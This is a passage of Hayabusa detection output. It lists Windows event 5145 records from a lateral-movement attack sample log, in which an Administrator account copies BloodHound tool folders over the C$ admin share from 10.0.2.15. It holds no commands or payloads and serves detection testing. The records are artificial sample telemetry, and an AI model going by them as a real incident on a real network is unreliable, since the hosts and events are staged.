Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 